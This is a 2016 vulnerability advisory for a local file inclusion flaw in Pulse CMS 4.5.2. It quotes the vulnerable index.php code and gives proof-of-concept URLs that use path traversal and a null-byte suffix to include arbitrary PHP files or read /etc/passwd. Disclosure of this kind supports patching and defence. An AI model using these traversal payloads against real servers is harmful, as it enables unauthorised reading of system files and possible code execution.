Document Title: =============== Pulse CMS 4.5.2 - Local File Inclusion References (Source): ==================== http://ehsansec.ir/advisories/plusecms452-lfi.txt Release Date: ============= 2016-02-28 Product & Service Introduction: =============================== Pulse CMS is the easiest way to build and deploy a responsive, content managed website. Since it's a flat file CMS there is no complicated database setup, just copy it to your server and go.(https://www.pulsecms.com/) Software Link: ============== http://www.pulsecms.com/download/pulse.zip Vulnerability Type: ========================= Local File Inclusion Vulnerability Details: ============================== I discovered a local file inclusion vulnerability in Pulse CMS 4.5.2. Exploitation Technique: ======================= Remote Severity Level: =============== High Vulnerable File & Code: ======================= index.php 9 $page = (isset($_GET['p']) && !empty($_GET['p'])) ? $_GET['p'] : 'home'; 10 $page = htmlspecialchars($page, ENT_QUOTES, 'UTF-8'); 11 12 if (preg_match("/\//", $page)){ 13 if(file_exists("content/pages/".$page."home.txt")){ 14 $page = $page."home"; 15 } 16 } 27 include("content/pages/$page.txt"); Proof of Concept (PoC): ======================= -- Local File Inclusion -- http://localhost/pluse/index.php?p=../../../../YourPHP.php -- For include other type files use null byte nullbyte -- http://localhost/pluse/index.php?p=../../../../etc/passwd%00.php PHP Exploit Author: ================== Ashiyane Digital Security Team Ehsan Hosseini http://ehsansec.ir/ SPX tnx to: =========== Bl4ck_mohajem Contact: ======== hehsan979@gmail.com info@ehsansec.ir